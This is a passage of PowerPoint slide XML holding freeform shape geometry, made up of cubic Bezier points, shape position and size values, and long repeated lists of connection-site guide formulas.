                      <a:pt x="665173" y="1980661"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="656601" y="1981232"/>
                      <a:pt x="648601" y="1976089"/>
                      <a:pt x="641172" y="1970946"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="615456" y="1950945"/>
                      <a:pt x="586312" y="1948659"/>
                      <a:pt x="555454" y="1953231"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="473164" y="1965803"/>
                      <a:pt x="390303" y="1978946"/>
                      <a:pt x="306299" y="1973232"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="242297" y="1972660"/>
                      <a:pt x="61717" y="1961231"/>
                      <a:pt x="70289" y="1953802"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110862" y="1918372"/>
                      <a:pt x="128577" y="1880656"/>
                      <a:pt x="133149" y="1856655"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140578" y="1813225"/>
                      <a:pt x="134863" y="1774937"/>
                      <a:pt x="127434" y="1732078"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118862" y="1684076"/>
                      <a:pt x="81718" y="1634359"/>
                      <a:pt x="0" y="1622930"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1622930"/>
                      <a:pt x="151435" y="1584643"/>
                      <a:pt x="205724" y="1596072"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="225153" y="1600072"/>
                      <a:pt x="241154" y="1589786"/>
                      <a:pt x="257154" y="1580071"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="288584" y="1562356"/>
                      <a:pt x="317728" y="1536641"/>
                      <a:pt x="358873" y="1557213"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="369731" y="1562928"/>
                      <a:pt x="380588" y="1552641"/>
                      <a:pt x="389732" y="1545212"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="421162" y="1519497"/>
                      <a:pt x="455449" y="1501782"/>
                      <a:pt x="496594" y="1495496"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="526881" y="1490924"/>
                      <a:pt x="547453" y="1473781"/>
                      <a:pt x="561168" y="1446922"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="580026" y="1410921"/>
                      <a:pt x="588026" y="1372062"/>
                      <a:pt x="588598" y="1332060"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="589169" y="1246913"/>
                      <a:pt x="590312" y="1161195"/>
                      <a:pt x="595456" y="1076048"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="598884" y="1013188"/>
                      <a:pt x="589741" y="949757"/>
                      <a:pt x="586884" y="886897"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="583455" y="815465"/>
                      <a:pt x="592598" y="745176"/>
                      <a:pt x="614313" y="677745"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="633171" y="620028"/>
                      <a:pt x="666887" y="572597"/>
                      <a:pt x="710318" y="530881"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="730319" y="512023"/>
                      <a:pt x="749177" y="490879"/>
                      <a:pt x="770320" y="472021"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1295487" y="24572"/>
                      <a:pt x="1411492" y="571"/>
                      <a:pt x="1458923" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1459494" y="0"/>
                      <a:pt x="1460066" y="0"/>
                      <a:pt x="1460637" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1468638" y="1143"/>
                      <a:pt x="1528069" y="8000"/>
                      <a:pt x="1550356" y="29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72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19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1A9C583-61A9-41B0-8A01-CC3F40B8D53C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9823220" y="2979687"/>
                <a:ext cx="1183640" cy="1608590"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 644380 w 1205803"/>
                  <a:gd name="connsiteY0" fmla="*/ 1651278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598259 w 1205803"/>
                  <a:gd name="connsiteY9" fmla="*/ 279 h 1653800"/>
                  <a:gd name="connsiteX10" fmla="*/ 789196 w 1205803"/>
                  <a:gd name="connsiteY10" fmla="*/ 41495 h 1653800"/>
                  <a:gd name="connsiteX11" fmla="*/ 983490 w 1205803"/>
                  <a:gd name="connsiteY11" fmla="*/ 212931 h 1653800"/>
                  <a:gd name="connsiteX12" fmla="*/ 1046350 w 1205803"/>
                  <a:gd name="connsiteY12" fmla="*/ 511802 h 1653800"/>
                  <a:gd name="connsiteX13" fmla="*/ 1094353 w 1205803"/>
                  <a:gd name="connsiteY13" fmla="*/ 473514 h 1653800"/>
                  <a:gd name="connsiteX14" fmla="*/ 1157213 w 1205803"/>
                  <a:gd name="connsiteY14" fmla="*/ 527231 h 1653800"/>
                  <a:gd name="connsiteX15" fmla="*/ 1205786 w 1205803"/>
                  <a:gd name="connsiteY15" fmla="*/ 770099 h 1653800"/>
                  <a:gd name="connsiteX16" fmla="*/ 1174927 w 1205803"/>
                  <a:gd name="connsiteY16" fmla="*/ 867246 h 1653800"/>
                  <a:gd name="connsiteX17" fmla="*/ 1146926 w 1205803"/>
                  <a:gd name="connsiteY17" fmla="*/ 910677 h 1653800"/>
                  <a:gd name="connsiteX18" fmla="*/ 1145500 w 1205803"/>
                  <a:gd name="connsiteY18" fmla="*/ 910881 h 1653800"/>
                  <a:gd name="connsiteX19" fmla="*/ 1146828 w 1205803"/>
                  <a:gd name="connsiteY19" fmla="*/ 906043 h 1653800"/>
                  <a:gd name="connsiteX20" fmla="*/ 1137212 w 1205803"/>
                  <a:gd name="connsiteY20" fmla="*/ 902677 h 1653800"/>
                  <a:gd name="connsiteX21" fmla="*/ 1054922 w 1205803"/>
                  <a:gd name="connsiteY21" fmla="*/ 983823 h 1653800"/>
                  <a:gd name="connsiteX22" fmla="*/ 1055494 w 1205803"/>
                  <a:gd name="connsiteY22" fmla="*/ 1144402 h 1653800"/>
                  <a:gd name="connsiteX23" fmla="*/ 992634 w 1205803"/>
                  <a:gd name="connsiteY23" fmla="*/ 1328410 h 1653800"/>
                  <a:gd name="connsiteX24" fmla="*/ 853770 w 1205803"/>
                  <a:gd name="connsiteY24" fmla="*/ 1488418 h 1653800"/>
                  <a:gd name="connsiteX25" fmla="*/ 651683 w 1205803"/>
                  <a:gd name="connsiteY25" fmla="*/ 1630737 h 1653800"/>
                  <a:gd name="connsiteX26" fmla="*/ 634660 w 1205803"/>
                  <a:gd name="connsiteY26" fmla="*/ 1639121 h 1653800"/>
                  <a:gd name="connsiteX27" fmla="*/ 634332 w 1205803"/>
                  <a:gd name="connsiteY27" fmla="*/ 1638710 h 1653800"/>
                  <a:gd name="connsiteX28" fmla="*/ 634903 w 1205803"/>
                  <a:gd name="connsiteY28" fmla="*/ 1634709 h 1653800"/>
                  <a:gd name="connsiteX29" fmla="*/ 550328 w 1205803"/>
                  <a:gd name="connsiteY29" fmla="*/ 1638710 h 1653800"/>
                  <a:gd name="connsiteX30" fmla="*/ 456609 w 1205803"/>
                  <a:gd name="connsiteY30" fmla="*/ 1575850 h 1653800"/>
                  <a:gd name="connsiteX31" fmla="*/ 417179 w 1205803"/>
                  <a:gd name="connsiteY31" fmla="*/ 1515847 h 1653800"/>
                  <a:gd name="connsiteX32" fmla="*/ 161167 w 1205803"/>
                  <a:gd name="connsiteY32" fmla="*/ 1154688 h 1653800"/>
                  <a:gd name="connsiteX33" fmla="*/ 23447 w 1205803"/>
                  <a:gd name="connsiteY33" fmla="*/ 779814 h 1653800"/>
                  <a:gd name="connsiteX34" fmla="*/ 17 w 1205803"/>
                  <a:gd name="connsiteY34" fmla="*/ 587805 h 1653800"/>
                  <a:gd name="connsiteX35" fmla="*/ 589 w 1205803"/>
                  <a:gd name="connsiteY35" fmla="*/ 544375 h 1653800"/>
                  <a:gd name="connsiteX36" fmla="*/ 77164 w 1205803"/>
                  <a:gd name="connsiteY36" fmla="*/ 250647 h 1653800"/>
                  <a:gd name="connsiteX37" fmla="*/ 393178 w 1205803"/>
                  <a:gd name="connsiteY37" fmla="*/ 37495 h 1653800"/>
                  <a:gd name="connsiteX38" fmla="*/ 598259 w 1205803"/>
                  <a:gd name="connsiteY38" fmla="*/ 279 h 1653800"/>
                  <a:gd name="connsiteX0" fmla="*/ 646396 w 1205803"/>
                  <a:gd name="connsiteY0" fmla="*/ 1653800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1145212 w 1205803"/>
                  <a:gd name="connsiteY9" fmla="*/ 913534 h 1653800"/>
                  <a:gd name="connsiteX10" fmla="*/ 598259 w 1205803"/>
                  <a:gd name="connsiteY10" fmla="*/ 279 h 1653800"/>
                  <a:gd name="connsiteX11" fmla="*/ 789196 w 1205803"/>
                  <a:gd name="connsiteY11" fmla="*/ 41495 h 1653800"/>
                  <a:gd name="connsiteX12" fmla="*/ 983490 w 1205803"/>
                  <a:gd name="connsiteY12" fmla="*/ 212931 h 1653800"/>
                  <a:gd name="connsiteX13" fmla="*/ 1046350 w 1205803"/>
                  <a:gd name="connsiteY13" fmla="*/ 511802 h 1653800"/>
                  <a:gd name="connsiteX14" fmla="*/ 1094353 w 1205803"/>
                  <a:gd name="connsiteY14" fmla="*/ 473514 h 1653800"/>
                  <a:gd name="connsiteX15" fmla="*/ 1157213 w 1205803"/>
                  <a:gd name="connsiteY15" fmla="*/ 527231 h 1653800"/>
                  <a:gd name="connsiteX16" fmla="*/ 1205786 w 1205803"/>
                  <a:gd name="connsiteY16" fmla="*/ 770099 h 1653800"/>
                  <a:gd name="connsiteX17" fmla="*/ 1174927 w 1205803"/>
                  <a:gd name="connsiteY17" fmla="*/ 867246 h 1653800"/>
                  <a:gd name="connsiteX18" fmla="*/ 1146926 w 1205803"/>
                  <a:gd name="connsiteY18" fmla="*/ 910677 h 1653800"/>
                  <a:gd name="connsiteX19" fmla="*/ 1145500 w 1205803"/>
                  <a:gd name="connsiteY19" fmla="*/ 910881 h 1653800"/>
                  <a:gd name="connsiteX20" fmla="*/ 1146828 w 1205803"/>
                  <a:gd name="connsiteY20" fmla="*/ 906043 h 1653800"/>
                  <a:gd name="connsiteX21" fmla="*/ 1137212 w 1205803"/>
                  <a:gd name="connsiteY21" fmla="*/ 902677 h 1653800"/>
                  <a:gd name="connsiteX22" fmla="*/ 1054922 w 1205803"/>
                  <a:gd name="connsiteY22" fmla="*/ 983823 h 1653800"/>
                  <a:gd name="connsiteX23" fmla="*/ 1055494 w 1205803"/>
                  <a:gd name="connsiteY23" fmla="*/ 1144402 h 1653800"/>
                  <a:gd name="connsiteX24" fmla="*/ 992634 w 1205803"/>
                  <a:gd name="connsiteY24" fmla="*/ 1328410 h 1653800"/>
                  <a:gd name="connsiteX25" fmla="*/ 853770 w 1205803"/>
                  <a:gd name="connsiteY25" fmla="*/ 1488418 h 1653800"/>
                  <a:gd name="connsiteX26" fmla="*/ 651683 w 1205803"/>
                  <a:gd name="connsiteY26" fmla="*/ 1630737 h 1653800"/>
                  <a:gd name="connsiteX27" fmla="*/ 634660 w 1205803"/>
                  <a:gd name="connsiteY27" fmla="*/ 1639121 h 1653800"/>
                  <a:gd name="connsiteX28" fmla="*/ 634332 w 1205803"/>
                  <a:gd name="connsiteY28" fmla="*/ 1638710 h 1653800"/>
                  <a:gd name="connsiteX29" fmla="*/ 634903 w 1205803"/>
                  <a:gd name="connsiteY29" fmla="*/ 1634709 h 1653800"/>
                  <a:gd name="connsiteX30" fmla="*/ 550328 w 1205803"/>
                  <a:gd name="connsiteY30" fmla="*/ 1638710 h 1653800"/>
                  <a:gd name="connsiteX31" fmla="*/ 456609 w 1205803"/>
                  <a:gd name="connsiteY31" fmla="*/ 1575850 h 1653800"/>
                  <a:gd name="connsiteX32" fmla="*/ 417179 w 1205803"/>
                  <a:gd name="connsiteY32" fmla="*/ 1515847 h 1653800"/>
                  <a:gd name="connsiteX33" fmla="*/ 161167 w 1205803"/>
                  <a:gd name="connsiteY33" fmla="*/ 1154688 h 1653800"/>
                  <a:gd name="connsiteX34" fmla="*/ 23447 w 1205803"/>
                  <a:gd name="connsiteY34" fmla="*/ 779814 h 1653800"/>
                  <a:gd name="connsiteX35" fmla="*/ 17 w 1205803"/>
                  <a:gd name="connsiteY35" fmla="*/ 587805 h 1653800"/>
                  <a:gd name="connsiteX36" fmla="*/ 589 w 1205803"/>
                  <a:gd name="connsiteY36" fmla="*/ 544375 h 1653800"/>
                  <a:gd name="connsiteX37" fmla="*/ 77164 w 1205803"/>
                  <a:gd name="connsiteY37" fmla="*/ 250647 h 1653800"/>
                  <a:gd name="connsiteX38" fmla="*/ 393178 w 1205803"/>
                  <a:gd name="connsiteY38" fmla="*/ 37495 h 1653800"/>
                  <a:gd name="connsiteX39" fmla="*/ 598259 w 1205803"/>
                  <a:gd name="connsiteY39" fmla="*/ 279 h 1653800"/>
                  <a:gd name="connsiteX0" fmla="*/ 1145212 w 1205803"/>
                  <a:gd name="connsiteY0" fmla="*/ 913534 h 1639479"/>
                  <a:gd name="connsiteX1" fmla="*/ 1149524 w 1205803"/>
                  <a:gd name="connsiteY1" fmla="*/ 943291 h 1639479"/>
                  <a:gd name="connsiteX2" fmla="*/ 1114092 w 1205803"/>
                  <a:gd name="connsiteY2" fmla="*/ 943291 h 1639479"/>
                  <a:gd name="connsiteX3" fmla="*/ 1130354 w 1205803"/>
                  <a:gd name="connsiteY3" fmla="*/ 927821 h 1639479"/>
                  <a:gd name="connsiteX4" fmla="*/ 1144712 w 1205803"/>
                  <a:gd name="connsiteY4" fmla="*/ 913749 h 1639479"/>
                  <a:gd name="connsiteX5" fmla="*/ 1144717 w 1205803"/>
                  <a:gd name="connsiteY5" fmla="*/ 913732 h 1639479"/>
                  <a:gd name="connsiteX6" fmla="*/ 1145212 w 1205803"/>
                  <a:gd name="connsiteY6" fmla="*/ 913534 h 1639479"/>
                  <a:gd name="connsiteX7" fmla="*/ 598259 w 1205803"/>
                  <a:gd name="connsiteY7" fmla="*/ 279 h 1639479"/>
                  <a:gd name="connsiteX8" fmla="*/ 789196 w 1205803"/>
                  <a:gd name="connsiteY8" fmla="*/ 41495 h 1639479"/>
                  <a:gd name="connsiteX9" fmla="*/ 983490 w 1205803"/>
                  <a:gd name="connsiteY9" fmla="*/ 212931 h 1639479"/>
                  <a:gd name="connsiteX10" fmla="*/ 1046350 w 1205803"/>
                  <a:gd name="connsiteY10" fmla="*/ 511802 h 1639479"/>
                  <a:gd name="connsiteX11" fmla="*/ 1094353 w 1205803"/>
                  <a:gd name="connsiteY11" fmla="*/ 473514 h 1639479"/>
                  <a:gd name="connsiteX12" fmla="*/ 1157213 w 1205803"/>
                  <a:gd name="connsiteY12" fmla="*/ 527231 h 1639479"/>
                  <a:gd name="connsiteX13" fmla="*/ 1205786 w 1205803"/>
                  <a:gd name="connsiteY13" fmla="*/ 770099 h 1639479"/>
                  <a:gd name="connsiteX14" fmla="*/ 1174927 w 1205803"/>
                  <a:gd name="connsiteY14" fmla="*/ 867246 h 1639479"/>
                  <a:gd name="connsiteX15" fmla="*/ 1146926 w 1205803"/>
                  <a:gd name="connsiteY15" fmla="*/ 910677 h 1639479"/>
                  <a:gd name="connsiteX16" fmla="*/ 1145500 w 1205803"/>
                  <a:gd name="connsiteY16" fmla="*/ 910881 h 1639479"/>
                  <a:gd name="connsiteX17" fmla="*/ 1146828 w 1205803"/>
                  <a:gd name="connsiteY17" fmla="*/ 906043 h 1639479"/>
                  <a:gd name="connsiteX18" fmla="*/ 1137212 w 1205803"/>
                  <a:gd name="connsiteY18" fmla="*/ 902677 h 1639479"/>
                  <a:gd name="connsiteX19" fmla="*/ 1054922 w 1205803"/>
                  <a:gd name="connsiteY19" fmla="*/ 983823 h 1639479"/>
                  <a:gd name="connsiteX20" fmla="*/ 1055494 w 1205803"/>
                  <a:gd name="connsiteY20" fmla="*/ 1144402 h 1639479"/>
                  <a:gd name="connsiteX21" fmla="*/ 992634 w 1205803"/>
                  <a:gd name="connsiteY21" fmla="*/ 1328410 h 1639479"/>
                  <a:gd name="connsiteX22" fmla="*/ 853770 w 1205803"/>
                  <a:gd name="connsiteY22" fmla="*/ 1488418 h 1639479"/>
                  <a:gd name="connsiteX23" fmla="*/ 651683 w 1205803"/>
                  <a:gd name="connsiteY23" fmla="*/ 1630737 h 1639479"/>
                  <a:gd name="connsiteX24" fmla="*/ 634660 w 1205803"/>
                  <a:gd name="connsiteY24" fmla="*/ 1639121 h 1639479"/>
                  <a:gd name="connsiteX25" fmla="*/ 634332 w 1205803"/>
                  <a:gd name="connsiteY25" fmla="*/ 1638710 h 1639479"/>
                  <a:gd name="connsiteX26" fmla="*/ 634903 w 1205803"/>
                  <a:gd name="connsiteY26" fmla="*/ 1634709 h 1639479"/>
                  <a:gd name="connsiteX27" fmla="*/ 550328 w 1205803"/>
                  <a:gd name="connsiteY27" fmla="*/ 1638710 h 1639479"/>
                  <a:gd name="connsiteX28" fmla="*/ 456609 w 1205803"/>
                  <a:gd name="connsiteY28" fmla="*/ 1575850 h 1639479"/>
                  <a:gd name="connsiteX29" fmla="*/ 417179 w 1205803"/>
                  <a:gd name="connsiteY29" fmla="*/ 1515847 h 1639479"/>
                  <a:gd name="connsiteX30" fmla="*/ 161167 w 1205803"/>
                  <a:gd name="connsiteY30" fmla="*/ 1154688 h 1639479"/>
                  <a:gd name="connsiteX31" fmla="*/ 23447 w 1205803"/>
                  <a:gd name="connsiteY31" fmla="*/ 779814 h 1639479"/>
                  <a:gd name="connsiteX32" fmla="*/ 17 w 1205803"/>
                  <a:gd name="connsiteY32" fmla="*/ 587805 h 1639479"/>
                  <a:gd name="connsiteX33" fmla="*/ 589 w 1205803"/>
                  <a:gd name="connsiteY33" fmla="*/ 544375 h 1639479"/>
                  <a:gd name="connsiteX34" fmla="*/ 77164 w 1205803"/>
                  <a:gd name="connsiteY34" fmla="*/ 250647 h 1639479"/>
                  <a:gd name="connsiteX35" fmla="*/ 393178 w 1205803"/>
                  <a:gd name="connsiteY35" fmla="*/ 37495 h 1639479"/>
                  <a:gd name="connsiteX36" fmla="*/ 598259 w 1205803"/>
                  <a:gd name="connsiteY36" fmla="*/ 279 h 1639479"/>
                  <a:gd name="connsiteX0" fmla="*/ 1145212 w 1205803"/>
                  <a:gd name="connsiteY0" fmla="*/ 913534 h 1639479"/>
                  <a:gd name="connsiteX1" fmla="*/ 1114092 w 1205803"/>
                  <a:gd name="connsiteY1" fmla="*/ 943291 h 1639479"/>
                  <a:gd name="connsiteX2" fmla="*/ 1130354 w 1205803"/>
                  <a:gd name="connsiteY2" fmla="*/ 927821 h 1639479"/>
                  <a:gd name="connsiteX3" fmla="*/ 1144712 w 1205803"/>
                  <a:gd name="connsiteY3" fmla="*/ 913749 h 1639479"/>
                  <a:gd name="connsiteX4" fmla="*/ 1144717 w 1205803"/>
                  <a:gd name="connsiteY4" fmla="*/ 913732 h 1639479"/>
                  <a:gd name="connsiteX5" fmla="*/ 1145212 w 1205803"/>
                  <a:gd name="connsiteY5" fmla="*/ 913534 h 1639479"/>
                  <a:gd name="connsiteX6" fmla="*/ 598259 w 1205803"/>
                  <a:gd name="connsiteY6" fmla="*/ 279 h 1639479"/>
                  <a:gd name="connsiteX7" fmla="*/ 789196 w 1205803"/>
                  <a:gd name="connsiteY7" fmla="*/ 41495 h 1639479"/>
                  <a:gd name="connsiteX8" fmla="*/ 983490 w 1205803"/>
                  <a:gd name="connsiteY8" fmla="*/ 212931 h 1639479"/>
                  <a:gd name="connsiteX9" fmla="*/ 1046350 w 1205803"/>
                  <a:gd name="connsiteY9" fmla="*/ 511802 h 1639479"/>
                  <a:gd name="connsiteX10" fmla="*/ 1094353 w 1205803"/>
                  <a:gd name="connsiteY10" fmla="*/ 473514 h 1639479"/>
                  <a:gd name="connsiteX11" fmla="*/ 1157213 w 1205803"/>
                  <a:gd name="connsiteY11" fmla="*/ 527231 h 1639479"/>
                  <a:gd name="connsiteX12" fmla="*/ 1205786 w 1205803"/>
                  <a:gd name="connsiteY12" fmla="*/ 770099 h 1639479"/>
                  <a:gd name="connsiteX13" fmla="*/ 1174927 w 1205803"/>
                  <a:gd name="connsiteY13" fmla="*/ 867246 h 1639479"/>
                  <a:gd name="connsiteX14" fmla="*/ 1146926 w 1205803"/>
                  <a:gd name="connsiteY14" fmla="*/ 910677 h 1639479"/>
                  <a:gd name="connsiteX15" fmla="*/ 1145500 w 1205803"/>
                  <a:gd name="connsiteY15" fmla="*/ 910881 h 1639479"/>
                  <a:gd name="connsiteX16" fmla="*/ 1146828 w 1205803"/>
                  <a:gd name="connsiteY16" fmla="*/ 906043 h 1639479"/>
                  <a:gd name="connsiteX17" fmla="*/ 1137212 w 1205803"/>
                  <a:gd name="connsiteY17" fmla="*/ 902677 h 1639479"/>
                  <a:gd name="connsiteX18" fmla="*/ 1054922 w 1205803"/>
                  <a:gd name="connsiteY18" fmla="*/ 983823 h 1639479"/>
                  <a:gd name="connsiteX19" fmla="*/ 1055494 w 1205803"/>
                  <a:gd name="connsiteY19" fmla="*/ 1144402 h 1639479"/>
                  <a:gd name="connsiteX20" fmla="*/ 992634 w 1205803"/>
                  <a:gd name="connsiteY20" fmla="*/ 1328410 h 1639479"/>
                  <a:gd name="connsiteX21" fmla="*/ 853770 w 1205803"/>
                  <a:gd name="connsiteY21" fmla="*/ 1488418 h 1639479"/>
                  <a:gd name="connsiteX22" fmla="*/ 651683 w 1205803"/>
                  <a:gd name="connsiteY22" fmla="*/ 1630737 h 1639479"/>
                  <a:gd name="connsiteX23" fmla="*/ 634660 w 1205803"/>
                  <a:gd name="connsiteY23" fmla="*/ 1639121 h 1639479"/>
                  <a:gd name="connsiteX24" fmla="*/ 634332 w 1205803"/>
                  <a:gd name="connsiteY24" fmla="*/ 1638710 h 1639479"/>
                  <a:gd name="connsiteX25" fmla="*/ 634903 w 1205803"/>
                  <a:gd name="connsiteY25" fmla="*/ 1634709 h 1639479"/>
                  <a:gd name="connsiteX26" fmla="*/ 550328 w 1205803"/>
                  <a:gd name="connsiteY26" fmla="*/ 1638710 h 1639479"/>
                  <a:gd name="connsiteX27" fmla="*/ 456609 w 1205803"/>
                  <a:gd name="connsiteY27" fmla="*/ 1575850 h 1639479"/>
                  <a:gd name="connsiteX28" fmla="*/ 417179 w 1205803"/>
                  <a:gd name="connsiteY28" fmla="*/ 1515847 h 1639479"/>
                  <a:gd name="connsiteX29" fmla="*/ 161167 w 1205803"/>
                  <a:gd name="connsiteY29" fmla="*/ 1154688 h 1639479"/>
                  <a:gd name="connsiteX30" fmla="*/ 23447 w 1205803"/>
                  <a:gd name="connsiteY30" fmla="*/ 779814 h 1639479"/>
                  <a:gd name="connsiteX31" fmla="*/ 17 w 1205803"/>
                  <a:gd name="connsiteY31" fmla="*/ 587805 h 1639479"/>
                  <a:gd name="connsiteX32" fmla="*/ 589 w 1205803"/>
                  <a:gd name="connsiteY32" fmla="*/ 544375 h 1639479"/>
                  <a:gd name="connsiteX33" fmla="*/ 77164 w 1205803"/>
                  <a:gd name="connsiteY33" fmla="*/ 250647 h 1639479"/>
                  <a:gd name="connsiteX34" fmla="*/ 393178 w 1205803"/>
                  <a:gd name="connsiteY34" fmla="*/ 37495 h 1639479"/>
                  <a:gd name="connsiteX35" fmla="*/ 598259 w 1205803"/>
                  <a:gd name="connsiteY35" fmla="*/ 279 h 1639479"/>
                  <a:gd name="connsiteX0" fmla="*/ 1145212 w 1205803"/>
                  <a:gd name="connsiteY0" fmla="*/ 913534 h 1639479"/>
                  <a:gd name="connsiteX1" fmla="*/ 1130354 w 1205803"/>
                  <a:gd name="connsiteY1" fmla="*/ 927821 h 1639479"/>
                  <a:gd name="connsiteX2" fmla="*/ 1144712 w 1205803"/>
                  <a:gd name="connsiteY2" fmla="*/ 913749 h 1639479"/>
                  <a:gd name="connsiteX3" fmla="*/ 1144717 w 1205803"/>
                  <a:gd name="connsiteY3" fmla="*/ 913732 h 1639479"/>
                  <a:gd name="connsiteX4" fmla="*/ 1145212 w 1205803"/>
                  <a:gd name="connsiteY4" fmla="*/ 913534 h 1639479"/>
                  <a:gd name="connsiteX5" fmla="*/ 598259 w 1205803"/>
                  <a:gd name="connsiteY5" fmla="*/ 279 h 1639479"/>
                  <a:gd name="connsiteX6" fmla="*/ 789196 w 1205803"/>
                  <a:gd name="connsiteY6" fmla="*/ 41495 h 1639479"/>
                  <a:gd name="connsiteX7" fmla="*/ 983490 w 1205803"/>
                  <a:gd name="connsiteY7" fmla="*/ 212931 h 1639479"/>
                  <a:gd name="connsiteX8" fmla="*/ 1046350 w 1205803"/>
                  <a:gd name="connsiteY8" fmla="*/ 511802 h 1639479"/>
                  <a:gd name="connsiteX9" fmla="*/ 1094353 w 1205803"/>
                  <a:gd name="connsiteY9" fmla="*/ 473514 h 1639479"/>
                  <a:gd name="connsiteX10" fmla="*/ 1157213 w 1205803"/>
                  <a:gd name="connsiteY10" fmla="*/ 527231 h 1639479"/>
                  <a:gd name="connsiteX11" fmla="*/ 1205786 w 1205803"/>
                  <a:gd name="connsiteY11" fmla="*/ 770099 h 1639479"/>
                  <a:gd name="connsiteX12" fmla="*/ 1174927 w 1205803"/>
                  <a:gd name="connsiteY12" fmla="*/ 867246 h 1639479"/>
                  <a:gd name="connsiteX13" fmla="*/ 1146926 w 1205803"/>
                  <a:gd name="connsiteY13" fmla="*/ 910677 h 1639479"/>
                  <a:gd name="connsiteX14" fmla="*/ 1145500 w 1205803"/>
                  <a:gd name="connsiteY14" fmla="*/ 910881 h 1639479"/>
                  <a:gd name="connsiteX15" fmla="*/ 1146828 w 1205803"/>
                  <a:gd name="connsiteY15" fmla="*/ 906043 h 1639479"/>
                  <a:gd name="connsiteX16" fmla="*/ 1137212 w 1205803"/>
                  <a:gd name="connsiteY16" fmla="*/ 902677 h 1639479"/>
                  <a:gd name="connsiteX17" fmla="*/ 1054922 w 1205803"/>
                  <a:gd name="connsiteY17" fmla="*/ 983823 h 1639479"/>
                  <a:gd name="connsiteX18" fmla="*/ 1055494 w 1205803"/>
                  <a:gd name="connsiteY18" fmla="*/ 1144402 h 1639479"/>
                  <a:gd name="connsiteX19" fmla="*/ 992634 w 1205803"/>
                  <a:gd name="connsiteY19" fmla="*/ 1328410 h 1639479"/>
                  <a:gd name="connsiteX20" fmla="*/ 853770 w 1205803"/>
                  <a:gd name="connsiteY20" fmla="*/ 1488418 h 1639479"/>
                  <a:gd name="connsiteX21" fmla="*/ 651683 w 1205803"/>
                  <a:gd name="connsiteY21" fmla="*/ 1630737 h 1639479"/>
                  <a:gd name="connsiteX22" fmla="*/ 634660 w 1205803"/>
                  <a:gd name="connsiteY22" fmla="*/ 1639121 h 1639479"/>
                  <a:gd name="connsiteX23" fmla="*/ 634332 w 1205803"/>
                  <a:gd name="connsiteY23" fmla="*/ 1638710 h 1639479"/>
                  <a:gd name="connsiteX24" fmla="*/ 634903 w 1205803"/>
                  <a:gd name="connsiteY24" fmla="*/ 1634709 h 1639479"/>
                  <a:gd name="connsiteX25" fmla="*/ 550328 w 1205803"/>
                  <a:gd name="connsiteY25" fmla="*/ 1638710 h 1639479"/>
                  <a:gd name="connsiteX26" fmla="*/ 456609 w 1205803"/>
                  <a:gd name="connsiteY26" fmla="*/ 1575850 h 1639479"/>
                  <a:gd name="connsiteX27" fmla="*/ 417179 w 1205803"/>
                  <a:gd name="connsiteY27" fmla="*/ 1515847 h 1639479"/>
                  <a:gd name="connsiteX28" fmla="*/ 161167 w 1205803"/>
                  <a:gd name="connsiteY28" fmla="*/ 1154688 h 1639479"/>
                  <a:gd name="connsiteX29" fmla="*/ 23447 w 1205803"/>
                  <a:gd name="connsiteY29" fmla="*/ 779814 h 1639479"/>
                  <a:gd name="connsiteX30" fmla="*/ 17 w 1205803"/>
                  <a:gd name="connsiteY30" fmla="*/ 587805 h 1639479"/>
                  <a:gd name="connsiteX31" fmla="*/ 589 w 1205803"/>
                  <a:gd name="connsiteY31" fmla="*/ 544375 h 1639479"/>
                  <a:gd name="connsiteX32" fmla="*/ 77164 w 1205803"/>
                  <a:gd name="connsiteY32" fmla="*/ 250647 h 1639479"/>
                  <a:gd name="connsiteX33" fmla="*/ 393178 w 1205803"/>
                  <a:gd name="connsiteY33" fmla="*/ 37495 h 1639479"/>
                  <a:gd name="connsiteX34" fmla="*/ 598259 w 1205803"/>
                  <a:gd name="connsiteY34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5500 w 1205803"/>
                  <a:gd name="connsiteY13" fmla="*/ 910881 h 1639479"/>
                  <a:gd name="connsiteX14" fmla="*/ 1146828 w 1205803"/>
                  <a:gd name="connsiteY14" fmla="*/ 906043 h 1639479"/>
                  <a:gd name="connsiteX15" fmla="*/ 1137212 w 1205803"/>
                  <a:gd name="connsiteY15" fmla="*/ 902677 h 1639479"/>
                  <a:gd name="connsiteX16" fmla="*/ 1054922 w 1205803"/>
                  <a:gd name="connsiteY16" fmla="*/ 983823 h 1639479"/>
                  <a:gd name="connsiteX17" fmla="*/ 1055494 w 1205803"/>
                  <a:gd name="connsiteY17" fmla="*/ 1144402 h 1639479"/>
                  <a:gd name="connsiteX18" fmla="*/ 992634 w 1205803"/>
                  <a:gd name="connsiteY18" fmla="*/ 1328410 h 1639479"/>
                  <a:gd name="connsiteX19" fmla="*/ 853770 w 1205803"/>
